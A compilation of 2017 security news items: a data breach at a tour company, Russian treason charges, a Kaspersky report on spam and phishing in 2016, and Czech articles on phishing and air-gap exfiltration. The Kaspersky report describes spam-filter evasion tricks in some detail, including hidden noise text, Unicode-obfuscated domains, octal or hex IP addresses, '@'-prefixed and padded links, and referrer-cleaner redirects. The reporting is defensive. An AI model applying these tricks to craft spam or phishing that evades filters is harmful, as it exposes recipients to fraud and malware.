“Cyber risks, especially across the supply chain, are difficult to address. Sixty-nine percent of respondents believe their organization is at risk because of uncertainty about the cybersecurity practices of third parties in the supply chain and 61 percent say their organization has difficulty in mitigating cyber risks across the oil and gas value chain.” continues the report.
Negligent and malicious or criminal insiders are considered the principal threats to the U.S. oil and gas industry.
“Together negligent and malicious or criminal insiders pose the most serious threat to critical operations. Sixty-five percent of respondents say the top cybersecurity threat is the negligent or careless insider and 15 percent of respondents say it is the malicious or criminal insider.”
Let’s close with a look at the factors that pose the major risks to the organizations. Roughly 60 percent of respondents pointed out outdated and aging control systems or vulnerable IT products used in production environments.
Roberts Hawaii tour company hacked, credit card and personal info exposed
27.2.2017 securityaffairs Hacking
The tour company Roberts Hawaii is warning its customers about a security breach that may affect people who purchased tours and other services on its website.
Did you visit the Hawaii in last year? The tour company Roberts Hawaii is warning its customers about a data breach that may affect people who purchased tours from July 2015 to December 2016. It is a very long period, but there is no information about the number of affected customers.
The Roberts Hawaii company offers tours along with school bus services, airport shuttles, and other transportation packages.
Compromised records include name, address, email address, phone number, payment card number, expiration date and card security code.
The tour company discovered the security breach after customers reported fraudulent charges on their credit cards.
“The tour company found out about the hack after getting reports of fraudulent charges on customers’ credit cards. The charges appeared shortly after the customers made purchases on Roberts Hawaii’s website.” reported the Hawaii News Now.
Roberts Hawaii
According to the investigators, the charges appeared shortly after the customers have purchased a tour on the website of the Roberts Hawaii.
“Roberts Hawaii received reports from several customers of fraudulent charges appearing on their payment cards shortly after they were used to make a purchase on its website.” reads the security advisory published by the company. “Roberts Hawaii immediately initiated an investigation and engaged a leading cyber security firm to examine their website network.”
The cyber criminals have compromised the web server of the company with a malicious code that copied customers’ data during the checkout procedure.
According to the Roberts Hawaii company, orders placed between July 30, 2015, and Dec. 14, 2016, may have been affected.
Roberts Hawaii confirmed to have stopped the security breach, it removed the malware installed on its server and shut down the affected payment collection pages.
“All payment collection pages on the compromised server were replaced entirely with third party online booking software and Roberts Hawaii is also taking steps to further strengthen the security of its website to help prevent a similar incident from happening in the future.” continues the advisory published by the company.
In order to mitigate the exposure of its customers, the company has established a dedicated call center ((877) 235-0796) and web page to answer customer questions.
“Our customers’ confidence and trust are important to us, and we sincerely apologize for any inconvenience or concern this may have caused. We are working swiftly to address this situation and help prevent a future recurrence,” said Wayne Fernandez, director of safety and security for Roberts Hawaii, in a news release.
Russian cyber experts were charged with treason due to the allegations made seven years ago
27.2.2017 securityaffairs Cyber
In December 2016 two Russian state security officers and a cyber security expert in Moscow were charged with treason due allegations made 7 years ago.
In December 2016 two Russian state security officers and a cyber-security expert in Moscow were charged with treason due to the allegations made by a Russian businessman seven years ago.
One of them is the head of the computer incidents investigation team at Kaspersky Lab, Ruslan Stoyanov, the two officers of the Federal Security Service (FSB) are Sergei Mikhailov and Dmitry Dokuchayev.
Russian cyber experts
According to the sources, the authorities arrested the suspects may have passed secrets to US firm Verisign and other unidentified American companies. These companies then have shared the secrets with US intelligence agencies.
The authorities have given no public explanation for the arrests, but the source connected to the investigation told the Reuters agency that the arrests were a result of accusations made in 2010 by Pavel Vrublevsky. Vrublevsky is a Russian businessman and founder of the online payments company ChronoPay.
Verisign representatives deny that the company received secrets from the cyber security expert.
“Verisign Vice President Joshua Ray declined to comment on Stoyanov specifically, but said his company acquired information in unclassified ways and does not believe its reports to government agencies and other customers included state secrets.” read the article published by the Reuters.
Russian authorities and the Russian FSB declined to comment on the case.
According to cyber security experts, the arrests are the response of the Kremlin to any sort of collaboration between Russian experts and US authorities.
“I can confirm we (Chronopay) expect to be part of this case. In 2010 we provided the FSB and other important Russian agencies with evidence that at least one FSB employee, as well as several other people, were involved in treason,” Vrublevsky told Reuters, referring to his past allegations against Stoyanov and Mikhailov.
Just after the allegations, Vrublevsky was arrested and convicted on charges of organizing a cyber attack on a competitor, but now he is free on parole.
Vrublevsky now added that a fourth person had been arrested in the case, he is Georgy Fomchenkov, a former FSB officer.
“Public documents available online show Stoyanov and Fomchenkov both had appeals against their detention rejected by the Moscow District Military Court on Feb. 15. Two days later, Mikhailov lost an appeal at the same court, which often hears sensitive cases relating to state security.” added the Reuters.
Spam and phishing in 2016
26.2.2017 Kaspersky Spam
The year in figures
According to Kaspersky Lab, in 2016:
The proportion of spam in email flows was 58.31%, which is 3.03 percentage points more than in 2015.
62.16% of spam emails were no more than 2 KB in size.
12.08% of spam was sent from the US.
Trojan.Win32.Bayrob was the most popular malware family distributed via email.
Germany (14.13%) was the country where email antivirus was triggered most often.
There were 154,957,897 instances of the Anti-Phishing system being triggered.
A total of 15.29% unique users were attacked by phishers.
Brazil suffered the highest number of phishing attacks, with 27.61% of the global total.
47.48% of incidents triggering the heuristic component in the Anti-Phishing system targeted clients of various financial organizations.
World events in spam
In 2016, fraudulent spam exploited the theme of major sporting events: the European Football Championship, the Olympic Games in Brazil, as well as the upcoming World Cups in 2018 and 2022. Typically, spammers send out fake notifications of lottery wins linked to one of these events. The content of the fake messages wasn’t exactly very original: the lottery was supposedly held by an official organization and the recipient’s address was randomly selected from millions of other addresses. To get their prize, the recipient had to reply to the email and provide some personal information.
With these sport-themed emails more details were often included in DOC, PDF or JPEG attachments that also contained graphic elements such as official emblems, event and sponsor logos. Messages that displayed the spam text directly in the body of the email were not very numerous. To add a bit of variety to their messages, spammers resorted to an old trick: they changed the text, the email addresses used for feedback, sender addresses, the attachment names, the size, etc. At the same, emails with the same attachment could be found in our traps on numerous occasions over a period of several months.
In the fourth quarter of 2016, spammers turned their attention to the future World Cup tournaments scheduled for 2018 and 2022. Spam traffic often included fraudulent notifications of lottery wins exploiting this theme.
The football theme was also used in malicious spam. In particular, cybercriminals sent out fake notifications with scans taken from a website that publishes news about computer games and the world of football, apparently in an attempt to arouse interest among recipients. The attached ZIP archive included a JavaScript downloader detected by Kaspersky Lab as Trojan-Downloader.Script.Generic. This malware, in turn, downloaded other malicious software to the victim’s computer.
The subject of terrorism, which has remained an important global issue in recent years, was also exploited in spam mailings. Numerous so-called Nigerian letters were sent to users on behalf of both state organization employees and individuals. The details of the stories may have differed, but the senders’ intention was the same – to get the recipient’s attention with promises of large sums of money and make them join in a conversation. Nigerian letters exploiting the tense situation in Syria remained popular in 2016 and were actively used to trick users.
Malicious spam exploiting the theme of terrorism was less common. It was used to steal personal information, organize DDoS attacks and install additional malware on victims’ computers.
Email offers from Chinese factories
In the email traffic for 2016, we often came across messages from Chinese factories and plants advertising their products. These spammers offered both finished products as well as spare parts for a variety of different spheres.
The text of a typical spam message began with an impersonal greeting to the recipient, followed by the name and surname of the factory manager. Often, the email described the merits of the company, its achievements and types of certification. The products offered by the company were either listed in the email or sent at the request of the recipient. For greater clarity, some of the emails also contained pictures of the goods on offer. At the end of the message, there were contact details (phone, mobile phone and fax numbers, email address, various messengers). Sometimes the contact details were specified in the image attached to the email.
The authors of the emails were representatives of the manufacturers, but the sender addresses were registered with both free email services and the companies’ domain names. Sometimes the messages included a company website, if the company had one.
In many countries, there was a time when small and medium-sized businesses preferred to use spam to promote their products. But users began to view this kind of advertising as undesirable, anti-spam laws were introduced, and, most importantly, new, more targeted, convenient and less intrusive advertising platforms appeared, with social networking sites prominent among them. We can only presume why Chinese businesses have not followed this trend (given that China has passed its own anti-spam law, which is one of the strictest in the world). The fact is that social networks in China are mainly internal, with global giants such as Facebook not permitted. As a result, Chinese entrepreneurs have far fewer legal means of entering the international market.
A year of ransomware in spam
In 2016, we recorded a huge amount of malicious spam. In previous years, Fraud.gen was the program most often used in malicious attachments. It appears in the form of an HTML page and is designed to steal the victim’s credit card data. In 2016, the absolute leaders in spam were Trojan downloaders that download ransomware to the victim’s computer. The most popular were mass spam mailings sent out to infect user computers with the Locky encryptor. However, other ransomware such as Petya, Cryakl and Shade were also widespread.
The number of malicious programs began to increase in December 2015 and continued to grow in waves throughout the year. The sharp falls were mainly caused by the fact that cybercriminals temporarily disabled the Necurs botnet, responsible for the majority of spam spreading Locky. Once the botnet was up and running again, the cybercriminals changed the spam templates.
Quantity of malicious emails in spam, 2016
In 2016, the Anti-Phishing system was triggered 239,979,660 times on the computers of Kaspersky Lab users, which is four times more than the previous year.
Such extensive use of ransomware may be due to the availability of this sort of malware on the black market. Currently, cybercriminals can not only rent a botnet to send out spam but also connect to so-called Ransomware-as-a-Service. This means that the attacker may not be a hacker in the traditional sense, and may not even know how to code.
Malicious spam messages often imitated personal correspondence, prompting recipients to view attached documents under various pretexts. Cybercriminals also sent out fake bills, or receipt notifications or even messages from office equipment with scanned documents allegedly attached.
Both examples above contain an attachment in the form of a malicious file with a .wsf extension, detected by Kaspersky Lab as Trojan-Downloader.JS.Agent.myd. The malicious file is written in JavaScript and downloads a Locky encryptor modification to the victim’s machine.
This screenshot shows an attachment containing a malicious file with a .jse extension, detected by Kaspersky Lab as Trojan-Downloader.JS.Cryptoload.auk. This is yet another malicious file written in JavaScript that downloads a Locky encryptor modification to the victim’s machine.
Overall, a wide variety of malicious attachments were used. As a rule, these were archives containing programs written in Java and JavaScript (JS files, JAR, WSF, WRN, and others), but there were also office documents with macros (DOC, DOCX, XLS, RTF) as well as classic executable files (EXE). Sometimes rare archive formats such as CAB were used.
When launched, ransomware programs encrypt the data on a user’s computer and demand a ransom (usually in bitcoins via the Tor network). More details about these programs can be found in our report Kaspersky Security Bulletin 2016. The ransomware revolution.
Spammer tricks
Adding ‘noise’ to text
To make each email unique, spammers insert random sequences of characters in their messages that are invisible to the user. This trick is not new, but spammers continue to use it, perfecting their methods. Below we describe the most popular tricks of 2016 used by spammers to add ‘noise’. All the examples below are taken from real-life spam messages.
Small letters and/or white text.
The easiest and oldest trick: the text can be written in white font (ffffff – 16 hexadecimal code written in white).
In this example, the random sequence of letters written in very small print and in white are arranged between words of a standard size in the sentence “You have received a £500”.
Text that is not displayed.
With the help of the attribute style = “display: none;” text in an email is simply not displayed. In standard situations, this tag is used in rough drafts, for example. When it comes to spam, these tags, containing random text, are inserted in messages in large quantities and if the anti-spam filter is not set up to process such tags, the text of an email practically disappears.
The same effect can be achieved by inserting a random sequence written in zero font:
Placing text outside the screen range.
Yet another way to make junk text invisible to the user is to write it in standard font, but insert it in parts of the email that are beyond the screen frame (to the extreme left or right, or below the main part):
Using tags that by default are not visible to users.
Sometimes random text is inserted in tags that are not designed to display text to the user. Typically, comment tags are used, though there are other examples:
The content of the <noscript> tag is only displayed on computers with unsupported or disabled scripts, so most users will not see it.
Using tags to add noise
Rather than using random sequences of characters that are made invisible, sometimes text is obfuscated with tags that have no value and cannot be interpreted:
The number of these sorts of tags in some spam emails can be in the hundreds.
Sometimes a very random sequence is inserted inside a tag as its attribute, rather than between specific tags:
This attribute will, of course, not be interpreted either and will not be displayed in the email that the user sees.
Masking links
There may be numerous ways of altering text in an email, but when it comes to URLs in spam messages, the situation is different. There can be lots of URLs in a single mass mailing (even reaching into the thousands), but they are subject to more limitations, as spammers have to pay for the purchase of each domain. However, attackers have come up with different techniques to make each link unique while also ensuring it opens correctly when clicked.
Obfuscation of domains using the UTF range:
In last year’s report we described some spammer tricks that involved different ways of expressing domain names and IP addresses. The trend for writing domain names using symbols from different UTF ranges and using different numerical systems for IP addresses continued in 2016.
Especially popular with spammers were mathematical alphanumeric symbols. For example:
Domain written using mathematical bold script.
Domain written using mathematical monospace small.
The range is designed for specific mathematical formulas and must not be used in plain text or hyperlinks.
Mixing encodings
The above trick was diversified by mixing encodings: spammers use the Latin alphabet in Unicode to write some of the domain characters, while the rest are written using characters from special URL-encoded ranges.
The domain from the example above is first changed to:
and then to server119.bullten.org.
URL shortening services with added noise
In addition to the various ways of writing the actual spammer site, from time to time cybercriminals use another trick to avoid mentioning the site directly in an email. This involves the use of URL shortening services and redirects. In 2016, spammers also resorted to a variety of other methods to add noise to each URL.
They inserted characters, slashes and dots between the URL shortening service and the actual link identifier (the meaningful part is marked in bold; the rest is noise):
Sometimes comment tags end up there:
To deceive filters further, the names of different, usually well-known, sites are inserted in the noise part:
All these parts will be dropped when the link is clicked.
Yet another way to obfuscate a link is to add non-existent parameters to the end of the link:
Everything that comes after the question mark in the link is not actually part of the URL – these characters are, in fact, parameters. The parameters can include a variety of information: for example, the unsubscribe link often contains the email address that needs to be entered in the unsubscribe form. However, URL shortening services, like many other sites, do not require or accept any parameters, so this part of the URL is simply dropped during the redirect process. Spammers take advantage of this and insert random sequences of parameters. In this particular case, the .pdf extension is added to the end of the parameters. This is not done to confuse the filters but rather the user, who is likely to think the link leads to a PDF file.
Prefixes
As well as parameters that can be added to the end of a link, noise elements can also be added to the beginning. These elements may include symbols that are ignored by the link interpreter when a redirect occurs, for example:
(In this example, in addition to the noise at the beginning of the link and nonexistent parameters at the end, the link itself is an IP address written partially in octal and partially in hexadecimal encoding.)
The most common technique for adding noise at the beginning of a link is to use the @ symbol. The @ symbol inserted before the domain can be utilized to identify the user in the domain (something that is no longer really applied these days). For sites that do not require identification, everything that comes before @ will simply be ignored by the browser.
The symbol is useful for spammers because it allows them not only to add noise to the link but also to make it look more trustworthy to the user by specifying a well-known site before the @ symbol.
Masked redirects
Redirects have long been used by spammers to hide the main domain. We have already written about this in some detail. In 2016, the redirect methods used were not that diverse, but links with redirects were also obfuscated. The methods used were the same as those used with URL shortening services: the @ symbol, parameters and additional characters.
Cybercriminals often used several techniques at once – concealing and obfuscating the original link:
In the example below, the name of the site used to distract the user’s attention comes before the @ symbol, followed by the redirect to the URL shortening service (which is also just noise with several @ symbols), and it is only from this part that the user will get to the spammer’s site.
Statistics
Proportion of spam in email traffic
In 2016, the proportion of spam in email traffic was 58.31%, which is 3.03 percentage points higher than the previous year.
The proportion of spam in email traffic, 2016
The lowest volume – 54.61% – was registered in February of 2016. After that, the proportion of spam grew steadily and reached a peak by the end of the year – 61.66% in November.
Interestingly, the last time there was an annual increase in the proportion of spam in email traffic was eight years ago. Since then, the percentage of spam has fallen continuously from its peak of 85.2% in 2009, to 55.28% in 2015. We believe this was due to legitimate small and medium-sized businesses gradually phasing out their use of spam, turning instead to legal advertising platforms.
The proportion of spam in global email traffic, 2009-2016
This downward trend may now have come to a halt because all those who wanted to or could refrain from using spammer services have, for the most part, already done so. This slight growth is the result of a sharp increase in spam containing malicious attachments.
Sources of spam by country
Sources of spam by country, 2016
In 2016, the top three sources of spam saw some changes: India climbed to third place with 10.15% due to a substantial growth in the volume of spam distributed (+7.19 p.p.). Such a dramatic increase may have been caused by botnets being organized in the region. Vietnam (10.32%) added 4.19 p.p. to its share and also moved up the rankings to second place. The US (12.08%) remained the clear leader despite a decrease of 3.08 p.p.
China’s share (4.66%) fell by 1.46 p.p., though it remained in fourth. Following close behind were two Latin American countries – Mexico (4.40%) and Brazil (4.01%). Russia (3.53%), among the top three in 2015, ranked seventh in 2016 after seeing a 2.62 p.p. decrease in its share of distributed spam.
France (3.39%, +0.22 p.p.) and Germany (3.21%, -1.03 p.p.) came eighth and ninth respectively. Turkey rounded off the Top 10 with a share of 2.29%, which is 0.34 p.p. more than in 2015.
The size of spam emails
The proportion of super-short spam emails (under 2 KB) dropped in 2016 and averaged 62.16%. This is 16.97 p.p. lower than in the previous year. The share of emails sized 2-5 KB also fell to 4.70%.
The size of spam emails in 2016
Meanwhile, the proportion of bigger emails increased considerably: 5-10 KB (6.15%), 10-20 KB (14.47%) and 20-50 KB (10.08%). It means that 2016 saw a trend towards fewer super-short spam emails and more emails of average size – from 5-50 KB. This was caused by a sharp increase in the proportion of spam with malicious attachments.
Malicious attachments in email
Malware families
TOP 10 malware families, 2016
In 2016, Trojan-Downloader.JS.Agent was the most widespread malware family. A typical representative of this malware family is an obfuscated Java script using ADODB.Stream technology to download and run DLL, EXE and PDF files.
The Trojan-Downloader.VBS.Agent family occupied second place. They are VBS scripts utilizing ADODB.Stream technology to download ZIP archives and run software extracted from them.
In third place was Trojan-Downloader.MSWord.Agent. These malicious programs are DOC files with an embedded macro written in Visual Basic for Applications (VBA) that runs when the document is opened. The macro downloads another malicious file from a malicious site and runs it on the user’s computer.
Trojan-Downloader.JS.Cryptoload in fourth is a malware family whose representatives are an obfuscated JavaScript that downloads and runs encryptors.
Trojan.Win32.Bayrob rounded off the top five. The malicious programs from this Trojan family can download and run additional modules from the command server, as well as act as a proxy server. They are used to send out spam and steal personal data.
The Trojan-PSW.Win32.Fareit family came sixth. These malicious programs are designed to steal data, such as the credentials of FTP clients installed on the infected computer, login details for cloud storage, cookie files in browsers, email passwords. Fareit Trojans send the collected information to a malicious server. Some members of the family are able to download and run other malware.
The representatives of the Trojan-Downloader.JS.SLoad family in seventh are JS scripts that download and run other malware, mostly encryptors, on the victim computer.
Eighth place was taken by the Trojan.Java.Agent family. The malicious programs of this family are written in Java and have the JAR extension. These applications exploit vulnerabilities in Sun Java Runtime and can delete, block, modify or copy data, as well as download and run other malware.
Ninth place was occupied by Backdoor.Win32.Androm. This malware belongs to the family of Andromeda/Gamarue universal modular bots. Key features of these bots include the ability to download, store and run a malicious executable file, download and boot a malicious DLL (without saving it to disk), and update and delete itself. The bot functionality is extended with the help of plugins that can be uploaded by the intruders at any time.
Completing the Top 10 is the Worm.Win32.WBVB family. It includes executable files written in Visual Basic 6 (both in P-code and Native mode) that are not trusted by KSN.
Countries targeted by malicious mailshots
Distribution of email antivirus verdicts by country, 2016
In 2016, Germany (14.13%) remained in first place, despite a decrease of 4.93 p.p. Second and third were occupied by countries from the Asia-Pacific region – Japan (7.59%) and China (7.32%) – that were both outside the Top 10 in 2015.
Russia (5.6%), which was third in the previous year’s rating, came fourth in 2016 after the proportion of email antivirus detections in the country decreased by 0.7 p.p. It was followed by Italy (5.44%), the UK (5.17%) and Brazil (4.99%), which also dropped out of the top three.
The US came eighth, accounting for 4.03% of email antivirus detections, 0.89 p.p. less than the previous year.
Austria (2.35%) rounded off the Top 10 with an increase of 0.93 p.p.
Phishing
In 2016, the Anti-Phishing system was triggered 154,957,897 times on the computers of Kaspersky Lab users. That is 6,562,451 more times than in 2015. Overall, 15.29% of our users were targeted by phishers.
Hot topics of the year
Phishers, predictably, could not pass up the most high-profile event of the year – the Olympic Games in Brazil. The scammers targeted both the organizers of the Olympic Games and ordinary netizens who received fake notifications of lottery wins, allegedly organized by the Brazilian government and the Olympic Committee.
The US presidential elections were also seen as a good media event for phishers. This theme was exploited to mislead internet users not only in the US but also in other countries.
Yet another interesting theme that became the subject of a dedicated study was holiday season sales. Scammers took advantage of the busy shopping period in the run-up to the festive season by creating fake websites of payment systems and online stores and luring potential victims by promising generous discounts.
A fake online store page
In addition, the holiday season itself often becomes an excellent cover for the fraudsters. For example, they may ask users to update their account information prior to the New Year.
Phishing page exploiting the New Year theme in the subdomain name
Methods of distributing phishing content
In 2016, cybercriminals used all possible means to reach users and make them pass on confidential information or money: social networks, pop-up ads, banners, text messages.
Among the most interesting methods were scams involving services for buying and selling used items. Cybercriminals collected phone numbers from ads placed on these services and then sent text messages to the numbers offering something in exchange at an extra cost. The message contained a link allegedly leading to a photo of the item on offer, but which actually led the victim to a phishing page.
Fraudsters often exploit social networks, and it is not restricted to personal messages. In 2016, many Facebook users around the world, for instance, were prompted to install a malicious extension for their browser, when they were added to a post containing a phishing link that supposedly led to a provocative video.
In Europe, the most widespread malicious extension was ‘xic. graphics’. It was soon removed from an online store, but according to the available whois information, over 50 other domains were registered in the name of the owners of the domain that hosted the fake page. Those domains were probably used for similar purposes.
Phisher tricks: referrer cleaner services
In Q4 2016, scammers showed a tendency to use referrer cleaner services. The victim was sent an email on behalf of a well-known company containing a link whose parameters included the address of the victim.
After clicking the URL, the user is taken to a page that shows a 302 error and then redirects the user to the address of a referrer cleaner service, which in turn redirects them to the legitimate website of a bank.
http://nullrefer.com/?https://www.cartalis.it/cartalis/prepagata/index.jsp
This way the user does not know that they have received a phishing email, while the bank does not receive a phishing domain in its referrers. At the same time, the phishers get confirmation that the user clicked on the link, which means that in future they will be able to send them more phishing emails, for example, in order to steal credit card data. In this way, the attackers ‘cleanse’ their databases of unused email addresses and vigilant recipients. They also detect clients of the bank whose name was used in the emails, allowing them to make their mass mailings more targeted.
The geography of attacks
Top 10 countries by percentage of attacked users
Brazil had the highest proportion of users subjected to phishing attacks (27.61%), a 5.98 p.p. increase on the previous year.
The percentage of users on whose computers the Anti-Phishing system was triggered out of the total number of Kaspersky Lab users in the country, 2016
In Brazil, we see lots of attacks targeting users of banks and online stores, so it is not surprising that the country often leads in the rating of countries with the highest proportion of users subjected to phishing attacks.
Phishers often place fake pages on the servers of government bodies in Brazil. This is one of the methods used to prevent phishing URLs from ending up on blacklists. It also enhances the credibility in the eyes of the victim. In 2016, we registered 1,043 such cases.
Fake page on the gov.br domain
Top 10 countries by percentage of attacked users
Country %
Brazil 27.61
China 22.84
Australia 20.07
Japan 19.16
Algeria 17.82
Russia 17.16
United Kingdom 16.64
Canada 16.03
United Arab Emirates 15.54
Saudi Arabia 15.39
China was second in this rating (22.84%). It didn’t make the Top 10 in 2015, but added 5.87 p.p. to its share in 2016. Australia (20.07%), which was seventh last year, came third following an increase of 2.39 p.p. Apart from Saudi Arabia (+ 4.9 p.p.), the shares of the other Top 10 countries barely changed.
The distribution of attacks by country
Russia (16.12%, +1.68 p.p.) topped the rating of countries where the Anti-Phishing system was trigged most often (out of the total number of the Anti-Phishing system detections around the world in 2016)
Distribution of Anti-Phishing system component detections by country, 2016
As in 2015, Brazil (8.77%) came second behind Russia, although its growth was negligible. The US added 0.5 p.p. (8.01%), which was enough to push India (6.01%) down to fourth. The top five also included China (7.86%).
Organizations under attack
The statistics on organizations used in phishing attacks are based on the triggering of the heuristic component in the Anti-Phishing system. The heuristic component is triggered when a user tries to follow a link to a phishing page and there is no information about the page in Kaspersky Lab’s databases.
Organizations under attack by category
In the second half of 2016, the proportion of phishing attacks targeting customers of financial institutions increased significantly (44.16% in the first quarter vs 48.14% in Q4). We have been following this growth over the last few years: in 2014, the average figure for the year was 28.74%; in 2015, it was 34.33%; and it was 47.47% in 2016.
In 2016, we saw significant growth in the proportion of phishing attacks on organizations belonging to the ‘Banks’ category (25.76%, + 8.31 p.p.). Of particular note was the increase in the percentage of targeted organizations in the ‘Online stores’ (10.17%, +1.09 p.p.) and ‘Payment systems’ (11.55%, +3.75 p.p.) categories.
Distribution of organizations subject to phishing attacks by category, 2016
At the same time, the share of the main categories decreased. For instance, the ‘Global Internet portals’ category (24.10%) lost 7.77 p.p. while the share of ‘Social networking sites’ (10.91%) fell by 5.49 p.p.
Overall, the priorities of the phishing scammers have not changed over the years. Attacks primarily exploit the names of popular brands, whose clients are numerous and likely to bring maximum financial profit.
Another priority is attacks that could lead to the acquisition of confidential information and, subsequently, money. For example, some portals from the ‘Global Internet portals’ category (Google, Yahoo!, Microsoft (live.com), etc.) use the same account to access multiple services. A successful phishing campaign can therefore give fraudsters access to several of the victim’s accounts.
Phishing page to attack Google users
Top 3 attacked organizations
Organization % of detected phishing links
Yahoo! 7.84
Facebook 7.13
Microsoft Corporation 6.98
Yahoo! (7.84%) again topped the ranking of organizations used by fraudsters to mask their attacks, although the proportion of Anti-Phishing system detections of fake pages mentioning this brand declined considerably in 2016 – by 6.86 p.p. (vs 10 p.p. in 2015). It is clear that the company is actively fighting phishing attacks, for example, by registering obfuscated domains in its own name (yshoogames.com, ypyahoo.com.cn, yhoonews.com, yhoooo.com, yayoo.com, yahou.com). However, phishers often place their content on legitimate sites (without the owners being aware of it) rather than create phishing domains.
Example of a web page using the Yahoo! brand
Second in popularity with the fraudsters was Facebook (7.13%). Over the year its share decreased by 2.38 p.p.
In 2016, we came across both classic phishing pages imitating the Facebook login page and various pages designed to steal data. One popular way of luring a victim is to promise them access to age-restricted content after entering their username and password, i.e., logging in to the system.
To increase the chances of hitting their target, mass phishing campaigns use the names of the most popular brands. Since these brands are often international, the attacks target users around the world. Naturally, phishing messages are written in many languages. One phisher trick was described in our report Spam and phishing in Q3 2016. By using information about the IP address of a potential victim, phishers determine the country in which they are located. Cybercriminals will then display pages in the language of the country that is identified.
Third place in our Top 3 was occupied by Microsoft (6.98%). Using this brand to hide their attacks, fraudsters often try to steal data from user accounts on the live.com portal. They tend to use pages imitating the login page of the company’s email service.
There are also other schemes, such as simulation of account verification:
Conclusions and forecasts
2016 saw a variety of changes in spam flows, with the increase in the number of malicious mass mailings containing ransomware being the most significant. These programs are readily available on the black market, and in 2017 the volume of malicious spam is unlikely to fall.
Spam became very popular with small and medium businesses in China in 2016. One possible reason for this is the Great Firewall of China, which makes it difficult for Chinese businesses to use legal international platforms for advertising.
Of all the techniques used by spammers in 2016, the various ways of adding noise to text and links with the help of HTML capabilities are worth noting. This is nothing new, but spammers are constantly coming up with new types of obfuscation, and they will obviously continue to do so in the future.
The proportion of spam in email traffic was 58.31%, which is 3.03 p.p. higher than 2015. This was the first registered growth since 2009 – this was partially down to the surge in malicious spam.
For several years in a row, the number of fraudulent schemes targeting clients of financial institutions has been increasing, and we expect this trend to continue. The attacks are becoming more versatile: the fraudulent pages adapt to the user and display information in the local language as well as other relevant data.
The methods for distributing fraudulent pages have gone far beyond the scope of email. Cybercriminals are using all available means to contact potential victims: text messages, advertising or social networks. The latter are not only a good channel of communication but also a useful resource helping intruders gather information to carry out a more effective attack on users.
Podvodníci jdou po penězích. Každou sekundu zosnují na internetu jeden útok
26.2.2017 Novinky/Bezpečnost
Vydávají se za pracovníky banky, ale klidně i za poslíčky doručovacích společností. Při lákání svých obětí na internetu jsou počítačoví piráti neskutečně vynalézaví. Využívají přitom zpravidla nepozornosti a strachu lidí. Cíl podobných phishingových útoků bývá většinou stejný – peníze.
Pojem phishing je možné přeložit do češtiny jako rybaření. Útočníci si totiž podobně jako rybáři skutečně počínají. Při této technice trpělivě vyčkávají na své oběti, aby je mohli nalákat na nějakou návnadu – například výhru či finanční hotovost.
Od důvěřivců pak vylákají klidně i hesla, čísla kreditních karet nebo jiné údaje. Uživatelé tak nevědomky pomáhají počítačovým pirátům ovládnout jejich účet nebo klidně i umožní ukrást peníze přes internetové bankovnictví.
Podobné phishingové útoky se nejčastěji síří prostřednictvím nevyžádaných e-mailů. V poslední době ale kyberzločinci velmi rádi používají také nejrůznější reklamy a sociální sítě.
Rybaří na celém internetu
Na první pohled by se mohlo zdát, že si počítačoví piráti přesně vybírají, na koho zaútočí. Opak je ale pravdou. Podle analýzy antivirové společnosti Kaspersky Lab za rok 2016, která byla zveřejněna tento týden, se totiž útok uskuteční každou sekundu. To jinými slovy znamená, že kyberzločinci své útoky často necílí, ale snaží se je šířit co nejvíce – rybaří tak doslova na celém internetu.
Je navíc evidentní, že útočníkům jde především o peníze. „V porovnání s rokem 2015 vzrostlo množství finančních phishingových útoků v roce 2016 o 13,14 procentních bodů. Ze všech zablokovaných phishingových útoků tak cílilo 47,48 % na finance,“ uvedli zástupci antivirové společnosti.
Loni jsme zaznamenali na 155 miliónů pokusů o vstup na různé phishingové stránky.
zástupci antivirové společnosti Kaspersky Lab
Z analýzy vyplývá také to, že uživatelé se na podobné rybářské snahy velmi často nechají nachytat. „V loňském roce zaznamenaly anti-phishingové technologie společnosti Kaspersky Lab téměř 155 miliónů uživatelských pokusů o vstup na různé phishingové stránky. Z tohoto počtu se v bezmála polovině heuristických detekcí jednalo o vstup na stránky s finančním phishingem,“ podotkli bezpečnostní experti.
„Jejich cílem bylo získat cenné osobní informace uživatelů, jako například čísla bankovních a kreditních účtů, čísla sociálního zabezpečení nebo přihlašovací jméno a heslo do internetového bankovnictví. Tyto informace chtěli kyberzločinci využít ke krádeži peněz obětí,“ stojí v závěrečné zprávě shrnující výsledky studie.
Nejčastěji se přitom podvodníci při podobných útocích vydávají za bankéře. „Každý čtvrtý útok (25,76 %) využil falešné bankovní informace nebo jiný obsah vztahující se k bankovním záležitostem – jedná se o nárůst o 8,31 procentního bodu oproti roku 2015. Podíl phishingu vztahujícího se k platebním systémům vzrostl o 11,55 % (nárůst oproti 2015 o 3,75 procentního bodu), a podíl phishingu z oblasti e-shopů vzrostl o 10,14 % (nárůst oproti 2015 o 1,09 procentního bodu). Podíl finančního phishingu detekovaného na MacOS činil 31,38 %,“ uzavřeli zástupci antivirové společnosti.
Obezřetnost je na místě
Při nejrůznějších nabídkách na internetu, které například slibují odměnu za použití nové verze internetového bankovnictví, by tak měli být uživatelé velmi opatrní. Vhodné je například přímo u své banky ověřit, zda podobná akce skutečně běží.
Stejně tak se vyplatí dávat pozor na různé soutěže a upozornění přepravních společností – v minulosti se totiž kyberzločinci vydávali například i za poslíčky. Uživatelům rozesílali SMS zprávy, ve kterých slibovali doručení nějakého balíčku.
Ve skutečnosti se však důvěřivce snažili pouze donutit stáhnout podvodnou aplikaci, která se aktivuje při snaze o spuštění internetového bankovnictví. Uživatelé tak svoje přihlašovací údaje naservírovali podvodníkům doslova jak na zlatém podnosu.
Blikající LEDka může být zneužita k úniku dat
26.2.2017 SecurityWorld Hacking
Izraelští vývojáři přišli na způsob, jak hacknout počítač pomocí diody hard disku.
Zdánlivě neškodně blikající kontrolky stolních počítačů či serverů mohou napáchat pořádné škody. Izraelští vývojáři přišli s novým způsobem, jak se skrz ně nabourat do počítače a dostat z něj citlivá data. Svůj objev prezentují videem, v němž hacknutý počítač skrz LED diodu vysílá data, která čte nedaleko poletující dron.
Metodu vyvinuli za účelem poukázání na zranitelnost tzv. air gap zařízení, tedy systémů či počítačů postrádajících z bezpečnostních důvodů bezdrátové technologie nebo počítačů záměrně odpojených od internetu. Takové obvykle obsahují vysoce důvěrné informace nebo slouží k ovládání důležitých infrastruktur. Už v minulosti se však k jejich datům podařilo proniknout například s využitím hluku vydávaného větrákem počítače či diskem anebo třeba s pomocí vyzařovaného tepla.
